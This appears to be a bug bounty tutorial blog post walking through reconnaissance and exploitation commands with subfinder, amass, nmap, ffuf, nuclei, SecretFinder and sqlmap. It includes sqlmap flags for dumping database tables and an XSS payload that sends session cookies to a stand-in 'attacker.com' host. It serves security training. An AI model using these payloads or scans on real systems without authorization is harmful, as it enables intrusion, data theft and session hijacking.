Listen to this Post
Introduction:
The digital landscape is a perpetual battleground, where security researchers and bug bounty hunters continuously probe applications for weaknesses. Mastering a core set of commands and tools is the difference between a blank results page and a successful bounty submission. This article provides a technical deep dive into the essential commands for modern web application and infrastructure reconnaissance, vulnerability discovery, and initial exploitation.
Learning Objectives:
- Master network reconnaissance and subdomain enumeration techniques.
- Understand automated vulnerability scanning with popular tools.
- Learn initial exploitation and proof-of-concept creation for common web flaws.
You Should Know:
1. Subdomain Enumeration with `subfinder` and `amass`
Subdomain discovery is the critical first step in expanding your attack surface. These tools passively and actively find subdomains associated with a target domain.
Passive Enumeration with subfinder subfinder -d target.com -o subdomains.txt Active Enumeration & Data Collection with amass amass enum -active -d target.com -src -ip -o amass_results.txt
Step-by-step guide:
- Install the tools using `go install` (requires Golang).
- Run `subfinder` first for a quick, passive list of known subdomains from various sources.
- Feed the output into `amass enum -active` for a more intensive scan. The `-active` flag enables DNS brute-forcing, while `-ip` resolves domains to IP addresses.
- Combine and sort the results:
cat subdomains.txt amass_results.txt | sort -u > all_subs.txt. This gives you a comprehensive target list.
2. Port Scanning and Service Discovery with `nmap`
Identifying open ports and running services reveals potential entry points into the target’s network.
Aggressive scan with service detection nmap -A -T4 -p- target_ip Top 1000 UDP ports scan (slower) nmap -sU --top-ports 1000 target_ip Output to all formats for reporting nmap -A -T4 -oA full_scan target_ip
Step-by-step guide:
- The `-A` flag enables OS detection, version detection, script scanning, and traceroute.
2. `-T4` sets the timing template for a faster scan.
3. `-p-` scans all 65,535 TCP ports. Use `-p 80,443,8080` for specific ports. - Analyze the output for services like SSH (22), HTTP/HTTPS (80/443), or potentially vulnerable older services like SMB (445).
3. Web Content Discovery with `ffuf`
Brute-forcing directories and files is essential for finding hidden endpoints, admin panels, and configuration files.
Directory and file brute-forcing ffuf -w /usr/share/wordlists/dirb/common.txt -u https://target.com/FUZZ Virtual Host Discovery (Subdomain Fuzzing) ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u https://target.com -H "Host: FUZZ.target.com" -fs 4242
Step-by-step guide:
1. `-w` specifies the wordlist path. The quality of your wordlist directly impacts your results.
2. The `FUZZ` keyword in the URL is where the tool injects payloads from the wordlist.
3. In the VHost fuzzing example, `-fs 4242` filters out responses of a specific size (found by checking the response size of the main domain), helping to identify subdomains that resolve to different content.
4. Automated Vulnerability Scanning with `nuclei`
Nuclei uses a community-powered database of templates to scan for thousands of known vulnerabilities and misconfigurations.
Scan with all templates (use with caution) nuclei -u https://target.com -t /path/to/nuclei-templates/ Scan with only newer, verified templates nuclei -u https://target.com -t /path/to/nuclei-templates/ -severity high,medium -bs 10
Step-by-step guide:
- Update your template database regularly with
nuclei -update-templates. - The `-severity` flag filters templates by their impact level.
3. `-bs 10` limits the number of concurrent requests to 10 to avoid overloading the target server. Always practice responsible disclosure.
5. Analyzing JavaScript for Hidden Endpoints and Secrets
Modern web apps heavily use JavaScript, which often contains hardcoded API keys, endpoints, and secrets.
Using grep to find common patterns grep -r "api_key" /path/to/downloaded/js/files/ Using a dedicated tool like secretfinder python3 SecretFinder.py -i https://target.com/static/app.js -o cli
Step-by-step guide:
- First, download all JavaScript files from the target. You can use a tool like `hakrawler` or a browser extension.
- Use `grep` with regular expressions to find patterns like
api[key|Key],password,secret,aws, etc. - Tools like `SecretFinder.py` automate this process by analyzing JS files both locally and remotely, decoding embedded data.
6. Testing for SQL Injection with `sqlmap`
SQL injection remains a critical vulnerability, allowing attackers to interfere with an application’s database queries.
Basic test on a parameter sqlmap -u "https://target.com/page?id=1" --batch Test with cookies for authenticated areas sqlmap -u "https://target.com/page?id=1" --cookie="session=abc123" --batch --level=2 Enumerate database names sqlmap -u "https://target.com/page?id=1" --dbs
Step-by-step guide:
- Identify a potential injectable parameter (e.g.,
?id=,?user=). - Run `sqlmap` with the `-u` flag and the vulnerable URL. The `–batch` flag runs the tool non-interactively, using default choices.
- If authentication is required, use the `–cookie` flag with a valid session cookie.
- If a vulnerability is found, use flags like `–dbs` (database names), `-D database_name –tables` (tables), and `-D database_name -T table_name –dump` (dump data) to exfiltrate information.
7. Exploiting Cross-Site Scripting (XSS) with a Proof-of-Concept
XSS vulnerabilities allow an attacker to inject malicious scripts into content viewed by other users.
<!-- Basic PoC Payload -->
<script>alert('XSS')</script>
<!-- Advanced PoC to steal cookies -->
<script>var i=new Image();i.src="https://attacker.com/steal.php?c="+document.cookie;</script>
Step-by-step guide:
- Identify a reflection point where user input is displayed on the page without proper sanitization (e.g., a search bar, comment field).
- Test with a simple payload like
<script>alert(1)</script>. If a pop-up appears, the site is vulnerable. - For a more impactful report, create a proof-of-concept that demonstrates a real-world risk, such as stealing session cookies. This shows the attacker could hijack a user’s account.
- Always test in a controlled environment or with explicit permission.
What Undercode Say:
- Automation is the Force Multiplier: The most successful hunters are not manually testing every parameter; they are masters of orchestration, chaining tools like
subfinder,httpx, and `nuclei` into custom pipelines that automatically filter and prioritize targets. - Context is King: A tool can find a potential vulnerability, but a human must validate it and understand its business impact. A critical IDOR vulnerability in a user’s profile is more valuable than a low-impact XSS on a static marketing page. The real skill lies in triaging the noise and focusing on the signals that matter.
Prediction:
The future of bug bounty hunting will be dominated by AI-assisted tooling. We will see the rise of intelligent agents that can not only find vulnerabilities but also understand application context, chain low-severity bugs into critical exploits, and even auto-generate comprehensive reports. This will level the playing field, allowing newer researchers to find complex bugs while pushing seasoned veterans to develop even more advanced, creative manual testing techniques to stay ahead of the automation curve. The core principles of understanding protocols, systems, and code, however, will remain the immutable foundation of security expertise.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Aditya Singh4180 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
